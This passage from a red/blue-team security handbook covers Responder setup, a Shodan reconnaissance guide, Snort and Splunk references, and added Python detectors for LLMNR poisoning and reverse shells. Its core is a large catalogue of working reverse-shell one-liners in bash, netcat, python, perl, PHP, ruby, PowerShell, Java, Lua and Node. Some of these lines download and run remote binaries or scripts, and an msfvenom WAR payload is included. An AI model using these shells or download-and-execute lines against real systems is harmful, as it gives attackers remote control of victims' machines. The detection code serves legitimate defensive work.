Be sure to run the following commands as root to unload these
possibly running services and limit conflicts:

launchctl unload /System/Library/LaunchDaemons/[Link]
launchctl unload /System/Library/LaunchDaemons/[Link]
launchctl unload /System/Library/LaunchDaemons/[Link]
launchctl unload /System/Library/LaunchDaemons/[Link]
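From the blue-team side, the simplest way to catch an LLMNR poisoner is the canary query: multicast a name that cannot exist and treat any answer as spoofing, since a legitimate host never claims a random name. The block below is an added example for this page, not Responder's code or any detection product: it builds the LLMNR query (DNS message layout on UDP 5355 per RFC 4795), parses A-record answers, and includes a constructed "poisoned" response so the parser can be checked offline. The canary name format and timeout are assumptions. The durable fixes the section already hints at are disabling LLMNR/NBT-NS by policy and requiring SMB signing, which removes the relay target entirely.

```python
import random
import socket
import struct

# Added example: LLMNR canary probe for poisoner detection (not Responder code).
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 multicast group and port

def encode_name(name):
    """DNS-style label encoding: length-prefixed labels ending with a zero byte."""
    return b"".join(struct.pack("B", len(l)) + l.encode() for l in name.split(".")) + b"\x00"

def build_llmnr_query(name, txid):
    """Standard query for an A record; LLMNR reuses the DNS header and question layout."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)          # flags=0, QDCOUNT=1
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN

def skip_name(data, off):
    """Return the offset just past a (possibly compressed) name starting at off."""
    while True:
        length = data[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:     # compression pointer occupies two bytes
            return off + 2
        off += 1 + length

def parse_llmnr_answers(data, expected_txid):
    """Return the IPv4 addresses in a response that carries our transaction id."""
    if len(data) < 12:
        return []
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not flags & 0x8000:   # QR bit must be set
        return []
    off = 12
    for _ in range(qdcount):
        off = skip_name(data, off) + 4                  # skip QTYPE/QCLASS
    addrs = []
    for _ in range(ancount):
        off = skip_name(data, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return addrs

def canary_probe(name=None, timeout=2.0):
    """Multicast a query for a name that does not exist; whoever answers is spoofing.
    Returns a list of (responder_ip, [addresses it claimed])."""
    name = name or "canary-%08x" % random.getrandbits(32)   # assumed canary format
    txid = random.getrandbits(16)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            data, (src, _) = sock.recvfrom(4096)
            answers = parse_llmnr_answers(data, txid)
            if answers:
                hits.append((src, answers))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits

def fake_poisoned_response(txid, name, spoofed_ip):
    """Constructed sample of a spoofed answer, used only to exercise the parser offline."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + socket.inet_aton(spoofed_ip)
    return header + question + answer

if __name__ == "__main__":
    for src, answers in canary_probe():
        print("LLMNR answer from %s for a name that should not resolve -> %s" % (src, answers))
```

Run the probe from a cron job or a monitoring host on each broadcast domain; a single hit is a high-confidence alert, and the source address is the machine running the poisoner.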

REFERENCE:
[Link]

REVERSE SHELLS
RED TEAM C2 WINDOWS/LINUX/MacOS
Various methods to establish a reverse shell on target host.

AWK
awk 'BEGIN {s = "/inet/tcp/0/[Link]/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

BASH TCP
bash -i >& /dev/tcp/[Link]/4242 0>&1

0<&196;exec 196<>/dev/tcp/[Link]/4242; sh <&196 >&196 2>&196

BASH UDP
Victim:
sh -i >& /dev/udp/[Link]/4242 0>&1
Listener:
nc -u -lvp 4242

SOCAT
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:[Link]:4242

user@victim$ wget -q [Link]binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:[Link]:4242

PERL
perl -e 'use Socket;$i="[Link]";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[Link]:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

**Windows ONLY
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[Link]:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PYTHON
**Linux ONLY

IPv4
export RHOST="[Link]";export RPORT=4242;python -c 'import sys,socket,os,pty;s=[Link]();[Link](([Link]("RHOST"),int([Link]("RPORT"))));[os.dup2([Link](),fd) for fd in (0,1,2)];[Link]("/bin/sh")'

IPv4
python -c 'import socket,subprocess,os;s=[Link](socket.AF_INET,socket.SOCK_STREAM);[Link](("[Link]",4242));os.dup2([Link](),0);os.dup2([Link](),1);os.dup2([Link](),2);import pty; [Link]("/bin/bash")'

IPv6
python -c 'import socket,subprocess,os,pty;s=[Link](socket.AF_INET6,[Link]K_STREAM);[Link](("[Link]",4242,0,2));os.dup2([Link]o(),0); os.dup2([Link](),1); os.dup2([Link](),2);p=[Link]("/bin/sh");'

python -c 'import socket,subprocess,os;s=[Link](socket.AF_INET,socket.SOCK_STREAM);[Link](("[Link]",4242));os.dup2([Link](),0); os.dup2([Link](),1); os.dup2([Link](),2);p=[Link](["/bin/sh","-i"]);'

**Windows ONLY
C:\Python27\[Link] -c "(lambda __y, __g, __contextlib:
[[[[[[[([Link](('[Link]', 4242)), [[[(s2p_thread.start(),
[[(p2s_thread.start(), (lambda __out: (lambda __ctx:
[__ctx.__enter__(), __ctx.__exit__(None, None, None),
__out[0](lambda: None)][2])(__contextlib.nested(type('except', (),
{'__enter__': lambda self: None, '__exit__': lambda __self,
__exctype, __value, __traceback: __exctype is not None and
(issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in
[(([Link](), lambda after: after())[1])]][0])})(), type('try', (),
{'__enter__': lambda self: None, '__exit__': lambda __self,
__exctype, __value, __traceback: [False for __out[0] in
[(([Link](), (lambda __after:
__after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in
[(True)]][0] for __g['p2s_thread'] in
[([Link](target=p2s, args=[s, p]))]][0])[1] for
s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in
[([Link](target=s2p, args=[s, p]))]][0] for __g['p'] in
[([Link](['\\windows\\system32\\[Link]'],
stdout=[Link], stderr=[Link],
stdin=[Link]))]][0])[1] for __g['s'] in
[([Link](socket.AF_INET, socket.SOCK_STREAM))]][0] for
__g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda
__after: __y(lambda __this: lambda:
(__l['s'].send(__l['p'].[Link](1)), __this())[1] if True else
__after())())(lambda: None) for __l['s'], __l['p'] in [(s,
p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda
s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda:
[(lambda __after: (__l['p'].[Link](__l['data']), __after())[1]
if (len(__l['data']) > 0) else __after())(lambda: __this()) for
__l['data'] in [(__l['s'].recv(1024))]][0] if True else
__after())())(lambda: None) for __l['s'], __l['p'] in [(s,
p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g,
__g))]][0] for __g['socket'] in [(__import__('socket', __g,
__g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g,
__g))]][0] for __g['threading'] in [(__import__('threading', __g,
__g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda:
y(y)()))), globals(), __import__('contextlib'))"

PHP
php -r '$sock=fsockopen("[Link]",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("[Link]",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

RUBY
ruby -rsocket -e'f=[Link]("[Link]",4242).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=[Link]("[Link]","4242");while(cmd=[Link]);[Link](cmd,"r"){|io|[Link] [Link]}end'

**Windows ONLY
ruby -rsocket -e 'c=[Link]("[Link]","4242");while(cmd=[Link]);[Link](cmd,"r"){|io|[Link] [Link]}end'

GOLANG
echo 'package main;import"os/exec";import"net";func main(){c,_:=[Link]("tcp","[Link]:4242");cmd:=[Link]("/bin/sh");[Link]=c;[Link]=c;[Link]=c;[Link]()}' > /tmp/[Link] && go run /tmp/[Link] && rm /tmp/[Link]

NETCAT Traditional
nc -e /bin/sh [Link] 4242
nc -e /bin/bash [Link] 4242
nc -c bash [Link] 4242

NETCAT OpenBsd
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Link] 4242 >/tmp/f

NCAT
ncat [Link] 4242 -e /bin/bash
ncat --udp [Link] 4242 -e /bin/bash

OPENSSL
ATTACKER:
user@attack$ openssl req -x509 -newkey rsa:4096 -keyout [Link] -out [Link] -days 365 -nodes
user@attack$ openssl s_server -quiet -key [Link] -cert [Link] -port 4242
or
user@attack$ ncat --ssl -vv -l -p 4242

VICTIM:
user@victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect [Link]:4242 > /tmp/s; rm /tmp/s

POWERSHELL
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object [Link]("[Link]",4242);$stream = $[Link]();[byte[]]$bytes = 0..65535|%{0};while(($i = $[Link]($bytes, 0, $[Link])) -ne 0){;$data = (New-Object -TypeName [Link]).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([[Link]]::ASCII).GetBytes($sendback2);$[Link]($sendbyte,0,$[Link]);$[Link]()};$[Link]()

powershell -nop -c "$client = New-Object [Link]('[Link]',4242);$stream = $[Link]();[byte[]]$bytes = 0..65535|%{0};while(($i = $[Link]($bytes, 0, $[Link])) -ne 0){;$data = (New-Object -TypeName [Link]).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([[Link]]::ASCII).GetBytes($sendback2);$[Link]($sendbyte,0,$[Link]);$[Link]()};$[Link]()"

powershell IEX (New-Object [Link]).DownloadString('[Link]taaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

JAVA
r = [Link]()
p = [Link](["/bin/bash","-c","exec 5<>/dev/tcp/[Link]/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
[Link]()

Java Alt1
String host="[Link]";
int port=4444;
String cmd="[Link]";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=[Link](),pe=[Link](),si=[Link]();
OutputStream po=[Link](),so=[Link]();
while(![Link]()){
    while([Link]()>0)[Link]([Link]());
    while([Link]()>0)s[Link]([Link]());
    while([Link]()>0)[Link]([Link]());
    [Link]ush();[Link]();
    [Link](50);
    try {[Link]();break;}catch (Exception e){}
};
[Link]();[Link]();

Java Alternative 2
Thread thread = new Thread(){
    public void run(){
        // Reverse shell here
    }
};
[Link]();

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Link] LPORT=4242 -f war > [Link]
strings [Link] | grep jsp # in order to get the name of the file

LUA
**Linux ONLY
lua -e "require('socket');require('os');t=[Link]();t:connect('[Link]','4242');[Link]('/bin/sh -i <&3 >&3 2>&3');"

Windows & Linux
lua5.1 -e 'local host, port = "[Link]", 4242 local socket = require("socket") local tcp = [Link]() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = [Link](cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

NodeJS
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = [Link]("/bin/sh", []);
    var client = new [Link]();
    [Link](4242, "[Link]", function(){
        [Link]([Link]);
        [Link](client);
        [Link](client);
    });
    return /a/; // Prevents the [Link] application from crashing
})();

or

require('child_process').exec('nc -e /bin/sh [Link] 4242')

or

-var x = [Link]
-x('child_process').exec('nc [Link] 4242 -e /bin/bash')

or

[Link]

GROOVY
String host="[Link]";
int port=4242;
String cmd="[Link]";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=[Link](),pe=[Link](),si=[Link]();
OutputStream po=[Link](),so=[Link]();
while(![Link]()){
    while([Link]()>0)[Link]([Link]());
    while([Link]()>0)s[Link]([Link]());
    while([Link]()>0)[Link]([Link]());
    [Link]ush();[Link]();
    [Link](50);
    try {[Link]();break;}catch (Exception e){}
};
[Link]();[Link]();

Groovy Alt1
[Link] {
    // Reverse shell here
}

SPAWN INTERPRETER TTY SHELL
/bin/sh -i
python3 -c 'import pty; [Link]("/bin/sh")'
python3 -c "__import__('pty').spawn('/bin/bash')"
python3 -c "__import__('subprocess').call(['/bin/bash'])"
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
perl -e 'print `/bin/bash`'
ruby: exec "/bin/sh"
lua: [Link]('/bin/sh')
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh
mysql: ! bash

INTERACTIVE REVERSE SHELL WINDOWS
**Pseudo Console (ConPty) in Windows: ConPtyShell uses the function
CreatePseudoConsole(). This function is available since Windows 10
/ Windows Server 2019 version 1809 (build 10.0.17763).

Server Side:
stty raw -echo; (stty size; cat) | nc -lvnp 3001

Client Side:
IEX(IWR [Link]voke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell [Link] 3001
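Every Linux variant above ends the same way: a shell whose stdin/stdout/stderr have been dup'd onto a socket (the Python one-liners do it explicitly with `os.dup2`, netcat and the `/dev/tcp` tricks do it through redirection). That artefact is what a defender can look for. The block below is an added example for this page, not code from the handbook or any EDR: it walks `/proc`, flags shell processes whose standard descriptors are sockets, and resolves the socket inode to the remote peer via `/proc/net/tcp`. The `/proc/net/tcp` sample and process list are constructed so the logic can be checked offline; the shell-name list is an assumption.

```python
import os
import socket
import struct

# Added example: find shells whose std fds are sockets (reverse-shell detection on Linux).
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}   # assumed list of shell binaries

def decode_proc_addr(hexaddr):
    """'0500000A:1092' (from /proc/net/tcp) -> ('10.0.0.5', 4242); IP is host-order hex."""
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)

def parse_proc_net_tcp(text):
    """Map socket inode -> (remote_ip, remote_port) for ESTABLISHED (st=01) connections."""
    table = {}
    for line in text.splitlines()[1:]:          # first line is the column header
        cols = line.split()
        if len(cols) < 10 or cols[3] != "01":
            continue
        table[cols[9]] = decode_proc_addr(cols[2])
    return table

def socket_inode(link_target):
    """'socket:[98765]' -> '98765'; anything else (pty, file, pipe) -> None."""
    if link_target.startswith("socket:[") and link_target.endswith("]"):
        return link_target[8:-1]
    return None

def find_reverse_shells(processes, tcp_table):
    """processes: iterable of (pid, comm, {fd: readlink target}). Flags shells whose
    stdin/stdout/stderr point at a socket and names the remote peer when it is a TCP socket."""
    findings = []
    for pid, comm, fds in processes:
        if comm not in SHELLS:
            continue
        inodes = {socket_inode(fds.get(fd, "")) for fd in (0, 1, 2)} - {None}
        if not inodes:
            continue
        peers = [tcp_table[i] for i in inodes if i in tcp_table]
        remote = "%s:%d" % peers[0] if peers else "unknown (udp/unix or not established)"
        findings.append({"pid": pid, "comm": comm, "remote": remote})
    return findings

def read_live_processes():
    """Walk /proc; entries we cannot read are skipped, so run as root for full coverage."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/comm" % pid) as fh:
                comm = fh.read().strip()
            fds = {fd: os.readlink("/proc/%s/fd/%d" % (pid, fd)) for fd in (0, 1, 2)}
        except OSError:
            continue
        procs.append((int(pid), comm, fds))
    return procs

# Constructed sample: one bash bound to a socket to 10.0.0.5:4242, one bash on a normal pty,
# and a python3 process on the same socket (the parent of a pty.spawn style shell).
SAMPLE_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0\n"
    "   1: 0A00000A:B2C4 0500000A:1092 01 00000000:00000000 00:00000000 00000000  1000        0 98765 1 0000000000000000 20 4 30 10 -1\n"
)
SAMPLE_PROCS = [
    (1337, "bash", {0: "socket:[98765]", 1: "socket:[98765]", 2: "socket:[98765]"}),
    (1338, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    (1339, "python3", {0: "socket:[98765]", 1: "socket:[98765]", 2: "socket:[98765]"}),
]

if __name__ == "__main__":
    with open("/proc/net/tcp") as fh:
        live = find_reverse_shells(read_live_processes(), parse_proc_net_tcp(fh.read()))
    for f in live:
        print("pid %(pid)d %(comm)s has std fds on a socket to %(remote)s" % f)
```

The check catches the shell itself, not the interpreter that spawned it, which is why the `pty.spawn` parent in the sample is ignored while its child `bash` would be reported. The socat and OpenSSL variants give the shell a pty instead of the raw socket, so pair this with a check for shells whose parent is socat or openssl.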

REFERENCE:
[Link]
%20and%20Resources/Reverse%20Shell%[Link]
[Link]
[Link]

SHODAN
RED/BLUE TEAM RECON/ASSET DISCOV ALL

SHODAN CLI
To install Shodan CLI:
# easy_install shodan
Or upgrade existing Shodan Python library:
# easy_install -U shodan

Once installed initialize the environment with your API key using
shodan init:
# shodan init YOUR_API_KEY
*Get your API key from your Shodan account page

Display Shodan query and scan credits available:
# shodan info

Show your external IP:
# shodan myip

Show information about an IP:
# shodan host <IPAddress>

Show the count of results for a search:
# shodan count <search string>
# shodan count WebBox

Show statistical information about a service:
# shodan stats --facets <facet> <string> country:<##>
# shodan stats --facets [Link] apache country:CN

Search banner information for text string and display IP, port,
organization, and hostnames:
# shodan search --fields ip_str,port,org,hostnames <string> | tee search_results.txt

Search a specific country's banner information for text string and
display IP, port, organization, and hostnames:
# shodan search --fields ip_str,port,org,hostnames <string> country:<##> | tee search_results.txt

Download lets you send JSON results into a file:
# shodan download <outfile> <search query>
# shodan download Microsoft-data Microsoft iis 6.0

Shodan network scanning request:
# shodan scan submit --filename scan_results.txt <IPAddress or CIDR>

Stream live Shodan scanning results:
# shodan stream --datadir /dir/path/results
# shodan stream --ports 80,443,3389

Real-Time network alert streaming/monitoring:
# shodan alert create "Scan results" <IP/CIDR>
Successful created network alert!
Alert ID: 6F2SCAZ6WV3CIAKE
# shodan stream --alert=<Alert ID> --datadir=scan-results/

Scan the entire internet (*Enterprise license):
# shodan scan internet <port> <protocol>

Query & display subdomains, records, IP, and ports:
# shodan domain [Link] -D

SHODAN WEB UI ([Link])

Shodan IP address search:
> [Link]
> [Link]/24

Shodan filter search results 'filter:value':
> city:"Istanbul" port:23,3389
**Filters:
category = ics, malware, etc... ; category:ics
city = city name; city:beijing
country = country name; country:china
hostname = find matching device hostname; server:"gws" hostname:"google"
net = show results only in cidr range; net:[Link]/24
org = narrow based on organization; org:"AT&T"
port = service port; port:23,22,3389
product = service running; product:openssh
geo = geo coordinates; geo:"56.7492,118.2640"
os = operating system; os:"windows 10"
before/after = devices in time range; apache after:21/01/2019 before:14/02/2019

Find websites that are clones by searching in the "Raw Data View"
in a result & searching for the "[Link].html_hash" value. Then
search for that value:
> hash:-1604454775

Raw Data Facets: [Link]

REFERENCE:
[Link]
[Link]
[Link]

SNORT
BLUE TEAM THREAT HUNT/DETECT ALL

Snort is an open-source, free and lightweight network intrusion
detection system.

BASIC SNORT RULE HEADER OUTLINE

[action][protocol][sourceIP][sourcePORT]->[destIP][destPORT]([Rule Options])

EXAMPLE SNORT RULE

RULE HEADER      alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
MESSAGE          msg:"BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt";
FLOW             flow:to_client,established;
DETECTION        file_data;
                 content:"recordset"; offset:14; depth:9;
                 content:".CacheSize"; distance:0; within:100;
                 pcre:"/CacheSize\s*=\s*/";
                 byte_test:10,>,0x3ffffffe,0,relative,string;
METADATA         metadata:policy max-detect-ips drop, service http;
REFERENCES       reference:cve,2016-8077;
CLASSIFICATION   classtype:attempted-user;
SIGNATURE ID     sid:65535; rev:1;
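A rule is a header of seven fixed fields followed by a parenthesised list of `keyword:value;` options, with `;` allowed inside the quoted `msg`, `content` and `pcre` values. The block below is an added example for this page, not Snort's own parser: it splits the example rule above into its header fields and option pairs, and runs a few lint checks a rule reviewer would want (message, sid/rev and classtype present, a recognised action, and at least one `content`/`pcre` match so the rule is not header-only). The one-line form of the rule is constructed from the labelled lines above.

```python
import re

# Added example: a small Snort rule parser and linter (not Snort's own code).
# The example rule from the page, joined into the single line Snort expects.
EXAMPLE_RULE = (
    r'alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ('
    r'msg:"BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; '
    r'flow:to_client,established; file_data; '
    r'content:"recordset"; offset:14; depth:9; '
    r'content:".CacheSize"; distance:0; within:100; '
    r'pcre:"/CacheSize\s*=\s*/"; '
    r'byte_test:10,>,0x3ffffffe,0,relative,string; '
    r'metadata:policy max-detect-ips drop, service http; '
    r'reference:cve,2016-8077; classtype:attempted-user; sid:65535; rev:1;)'
)

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<direction>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<options>.*)\)\s*$",
    re.S,
)

def split_options(body):
    """Split 'k:v; k; ...' on semicolons outside double quotes; backslash escapes the next char.
    Returns a list of (keyword, value-or-None) pairs in rule order."""
    items, buf, in_quote, escaped = [], [], False, False
    for ch in body:
        if escaped:
            buf.append(ch)
            escaped = False
            continue
        if ch == "\\":
            buf.append(ch)
            escaped = True
            continue
        if ch == '"':
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            items.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    if "".join(buf).strip():
        items.append("".join(buf).strip())
    pairs = []
    for item in items:
        if not item:
            continue
        key, sep, value = item.partition(":")
        pairs.append((key.strip(), value.strip() if sep else None))
    return pairs

def parse_rule(text):
    """Return a dict with the seven header fields plus 'options' (list of pairs)."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("not a single-line Snort rule")
    rule = m.groupdict()
    rule["options"] = split_options(rule.pop("options"))
    return rule

def option_values(rule, keyword):
    return [v for k, v in rule["options"] if k == keyword]

def lint(rule):
    """Checks a reviewer applies before a rule goes into the ruleset."""
    problems = []
    for key in ("msg", "sid", "rev", "classtype"):
        if not option_values(rule, key):
            problems.append("missing %s" % key)
    if rule["action"] not in {"alert", "log", "pass", "drop", "reject", "sdrop"}:
        problems.append("unknown action %s" % rule["action"])
    if not any(k in ("content", "pcre") for k, _ in rule["options"]):
        problems.append("no content/pcre match: header-only rules are noisy")
    return problems

if __name__ == "__main__":
    parsed = parse_rule(EXAMPLE_RULE)
    print(parsed["action"], parsed["proto"], parsed["src"], parsed["sport"], parsed["direction"],
          parsed["dst"], parsed["dport"])
    for k, v in parsed["options"]:
        print("  %-12s %s" % (k, v if v is not None else ""))
    print("lint:", lint(parsed) or "ok")
```

Note that `split_options` keeps the quotes on `content` and `pcre` values; that is deliberate, because the `|..|` hex notation and the `/.../flags` pcre form both need to be interpreted by later stages, not by the splitter.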

REFERENCE:
[Link]
[Link]
[Link]/production/document_files/files/000/000/116/original/
Snort_rule_infographic.pdf

SPLUNK
BLUE TEAM THREAT HUNT/DETECT ALL
Splunk is a software platform to search, analyze and visualize the
machine-generated data gathered from the websites, applications,
sensors, devices etc. which make up IT infrastructure.

ADD FIELDS: Extract data from events into fields so that you can
analyze and run reports on it in a meaningful way.

* | extract reload=true
    Extract field/value pairs and reload field extraction settings
    from disk.
* | extract pairdelim="|;", kvdelim="=:", auto=f
    Extract field/value pairs that are delimited by "|;", and values
    of fields that are delimited by "=:".
* | multikv fields COMMAND filter splunkd
    Extract the COMMAND field when it occurs in rows that contain
    "splunkd".
* | xmlkv
    Automatically extracts fields from XML-formatted data.
* | rex field=_raw "From: (?<from>.*) To: (?<to>.*)"
    Extract "from" and "to" fields using regular expressions. If a
    raw event contains "From: Susan To: Bob", then from=Susan and
    to=Bob.
* | strcat sourceIP "/" destIP comboIP
    Add the field: comboIP. Values of comboIP = "sourceIP + "/" +
    destIP".
* | eval velocity=distance/time
    Add the field: velocity. Values of velocity = distance field
    value / time field value (using an SQLite evaluation).
404 host=webserver1 | head 20 | iplocation
    Add location information (based on IP address) to the first
    twenty events that contain "404" and are from webserver1.

CONVERT FIELDS: Change the names of fields, the units of values
stored in fields, the types of data stored in fields, or the
attributes of fields.

* | convert auto(*) none(foo)
    Convert every field value to a number value except for values in
    the field "foo" (use the none argument to specify fields to
    ignore).
* | convert memk(virt)
    Change all memory values in the virt field to Kilobytes.
* | convert dur2sec(delay)
    Change the sendmail syslog duration format (D+HH:MM:SS) to
    seconds. For example, if delay="[Link]", the resulting value
    will be delay="615".
* | convert rmunit(duration)
    Convert values of the duration field into number value by
    removing string values in the field value. For example, if
    duration="212 sec", the resulting value will be duration="212".
* | rename _ip as IPAddress
    Rename the _ip field as IPAddress.
* | replace *localhost with localhost in host
    Change any host value that ends with "localhost" to "localhost".

FILTER AND ORDER FIELDS: Filter and re-arrange how Splunk displays
fields within search results.

* | fields host, ip
    Keep only the host and ip fields, and display them in the order:
    host, ip.
* | fields + host, ip
    Keep only the host and ip fields, and remove all internal fields
    (for example, _time, _raw, etc.) that may cause problems in
    Splunk Web.
* | fields - host, ip
    Remove the host and ip fields.

FILTER RESULTS: Filter search result sets by removing duplicate
events, using regular expressions, or by searching within a result
set.

* | search src="10.9.165.*" OR dst="[Link]"
    Keep only search results that have matching src or dst values.
* | regex _raw=(?<!\d)10.\d{1,3}\.\d{1,3}\.\d{1,3}(?!\d)
    Keep only search results whose _raw field contains IP addresses
    in the non-routable class A ([Link]/8).
* | dedup host
    Remove duplicates of results with the same host value.
* Fatal | rex "(?i) msg=(?P[^,]+)"
    rex is for extracting a pattern and storing it as a new field.
* | regex _raw=".*Fatal.*"
    regex is like grep and can use regular expressions against
    output results.

ORDER RESULTS: Sort, re-order, or return a portion of a search
result set.

* | sort ip, -url
    Sort results by ip value in ascending order and then by url
    value in descending order.
* | reverse
    Reverse the order of a result set.
* | head 20
    Return the first 20 results.
* | tail 20
    Return the last 20 results (in reverse order).
* | head 1000 | top 50 method
    Return first 1000 lines of log file and order top 50 results.

GROUP RESULTS: Group search results into a transaction (a single
observation of any event stretching over multiple logged events)
based on related pieces of information, or group results by
statistical correlation.

* | transaction fields="host,cookie" maxspan=30s maxpause=5s
    Group search results that have the same host and cookie, occur
    within 30 seconds of each other, and do not have a pause greater
    than 5 seconds between each event into a transaction.
* | transaction fields=from maxspan=30s maxpause=5s
    Group search results that share the same value of from, with a
    maximum span of 30 seconds, and a pause between events no
    greater than 5 seconds into a transaction.
* | kmeans k=4 date_hour date_minute
    Group search results into 4 clusters based on the values of the
    date_hour and date_minute fields.
* | cluster t=0.9 showcount=true | sort -cluster_count | head 20
    Cluster events together, sort them by their cluster_count
    values, and then return the 20 largest.

CLASSIFY EVENTS: Classify events as a type (event type), or have
Splunk automatically classify events.

* | typer
    Force Splunk to apply event types that you have configured
    (Splunk Web automatically does this when you view the eventtype
    field).
error | typelearner
    Have Splunk automatically discover and apply event types to
    events that contain the string "error".

CHANGE DISPLAY FORMATTING: Generate search results from your data
using commands other than search. You must use a pipe ( | ) before
any data-generating command that isn't the search command.

| inputcsv [Link] | search error | outputcsv [Link]
    Read in results from the CSV file:
    $SPLUNK_HOME/var/run/splunk/[Link], keep any that contain the
    string "error", and save the results to the file:
    $SPLUNK_HOME/var/run/splunk/[Link].
| file /var/log/messages.1
    Display events from the file messages.1 as if the events were
    indexed in Splunk.
| savedsearch mysecurityquery AND _count > 0 | sendemail to=user@[Link]
    Run the mysecurityquery saved search, and email any results to
    user@[Link].

REPORTING: Summarize the results of any search as a report by
performing statistical operations, and graphing functions.

* | rare url
    Return the least common values of the url field.
* | top limit=20 url
    Return the 20 most common values of the url field.
* | stats dc(host)
    Remove duplicates of results with the same host value and return
    the total count of the remaining results.
* | stats avg(*lay) BY date_hour
    Return the average for each hour, of any unique field that ends
    with the string "lay" (for example, delay, xdelay, relay, etc).
sourcetype=access_combined | top limit=100 referer_domain | stats sum(count)
    Search the access logs, and return the number of hits from the
    top 100 values of referer_domain.
sourcetype=access_combined | associate supcnt=3
    Search the access logs, and return the results associated with
    each other (that have at least 3 references to each other).
* | chart avg(size) by host
    Return the average (mean) size for each distinct host.
* | chart max(delay) by size bins=10
